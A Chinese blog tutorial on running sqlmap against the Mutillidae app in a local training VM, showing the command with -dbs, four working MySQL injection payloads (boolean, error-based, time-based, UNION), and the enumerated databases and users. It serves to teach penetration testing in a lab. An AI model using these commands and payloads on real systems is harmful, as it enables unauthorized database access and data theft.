SQLmap 自动注入 -02

shenghuiping20012025-01-22 14:18

1: 如果想获得SQL 数据库的信息,可以加入参数: -dbs

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -dbs

! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

\* starting @ 06:07:47 /2025-01-21/

06:07:47 INFO resuming back-end DBMS 'mysql'

06:07:47 INFO testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=vpgtsrbl91e...40rho4rej4;showhints=1'). Do you want to use those Y/n Y

sqlmap resumed the following injection point(s) from stored session:

Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details

06:07:48 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

06:07:48 INFO fetching database names

06:07:50 WARNING reflective value(s) found and filtering out

available databases 34:

\* .svn

\* bricks

\* bwapp

\* citizens

\* cryptomg

\* dvwa

\* gallery2

\* getboo

\* ghost

\* gtd-php

\* hex

\* information_schema

\* isp

\* joomla

\* mutillidae

\* mysql

\* nowasp

\* orangehrm

\* personalblog

\* peruggia

\* phpbb

\* phpmyadmin

\* proxy

\* rentnet

\* sqlol

\* tikiwiki

\* vicnum

\* wackopicko

\* wavsepdb

\* webcal

\* webgoat_coins

\* wordpress

\* wraithlogin

\* yazd

06:07:52 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:07:52 WARNING your sqlmap version is outdated

\* ending @ 06:07:52 /2025-01-21/

下面列一下参数的作用:

下面看一下执行结果:

! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

\* starting @ 06:11:28 /2025-01-21/

06:11:29 INFO resuming back-end DBMS 'mysql'

06:11:29 INFO testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfganof3ik5...ukdpgiq063;showhints=1'). Do you want to use those Y/n Y

sqlmap resumed the following injection point(s) from stored session:

Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details

06:11:30 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP 5.3.2, PHP

back-end DBMS: MySQL >= 5.0

06:11:30 INFO fetching database users

06:11:32 WARNING reflective value(s) found and filtering out

database management system users 38:

\* 'bricks'@'%'

\* 'bwapp'@'%'

\* 'citizens'@'localhost'

\* 'cryptomg'@'%'

\* 'debian-sys-maint'@'localhost'

\* 'dvwa'@'%'

\* 'gallery2'@'localhost'

\* 'getboo'@'%'

\* 'ghost'@'%'

\* 'gtd-php'@'%'

\* 'hex'@'localhost'

\* 'joomla'@'localhost'

\* 'jotto'@'%'

\* 'kbloom'@'localhost'

\* 'mutillidae'@'%'

\* 'orangehrm'@'%'

\* 'personalblog'@'%'

\* 'peruggia'@'%'

\* 'phpbb'@'%'

\* 'phpmyadmin'@'localhost'

\* 'root'@'127.0.0.1'

\* 'root'@'brokenwebapps'

\* 'root'@'localhost'

\* 'sendmail'@'localhost'

\* 'sqlol'@'%'

\* 'stealth'@'localhost'

\* 'tikiwiki'@'localhost'

\* 'undertaker'@'localhost'

\* 'vicnum'@'localhost'

\* 'wackopicko'@'%'

\* 'wavsep'@'localhost'

\* 'webcal'@'localhost'

\* 'webgoat.net'@'%'

\* 'webmaster'@'localhost'

\* 'wordpress'@'%'

\* 'wraith'@'localhost'

\* 'yazd'@'%'

\* 'yazd10'@'%'

06:11:34 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:11:34 WARNING your sqlmap version is outdated

\* ending @ 06:11:34 /2025-01-21/

可以看出上面是所有用户的结果,如果看当前用户,那么如下结果:

06:19:04 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

06:19:04 INFO fetching current user

06:19:06 WARNING reflective value(s) found and filtering out

current user: 'mutillidae@%'

06:19:06 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:19:06 WARNING your sqlmap version is outdated

\* ending @ 06:19:06 /2025-01-21/

参考文献: 16.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
北顾笙9805 分钟前
MYSQL-day03
数据库·sql·mysql
ULIi096kr31 分钟前
MySQL大表优化终极方案:单表数据量上限、卡顿解决、分表分库实战教程
数据库·mysql
deviant-ART38 分钟前
MySQL里的三个concat函数
数据库·mysql
H_老邪1 小时前
1044 - Access denied for user ‘root‘@‘%‘ to database ‘nacos‘
数据库·mysql
lcreek1 小时前
SQL盲注漏洞详解 DVWA High
网络安全·sql注入
凭X而动2 小时前
MySQL 5.7.44 部署
数据库·mysql·部署
Adorable老犀牛2 小时前
MySQL Server Exporter:Prometheus 监控 MySQL/MariaDB 指南
mysql·prometheus·mariadb
范什么特西3 小时前
重点:mybatis注意细节
java·mysql·mybatis
swordbob4 小时前
MySQL和Oracle关于读未提交的区别
数据库·mysql·oracle
林九生4 小时前
【实用技巧】MySQL 绿色版一键路径更新脚本详解 —— update_path.bat 深度解析
android·数据库·mysql
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解02《置身钉内》原文-可播放阅读03【AI】2026 年具身智能模型和世界模型总结042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析06AI科技热点日报 | 2026年6月1日072026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?08GitHub 镜像站点09AI一周事件 · 2026-06-03 至 2026-06-09102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf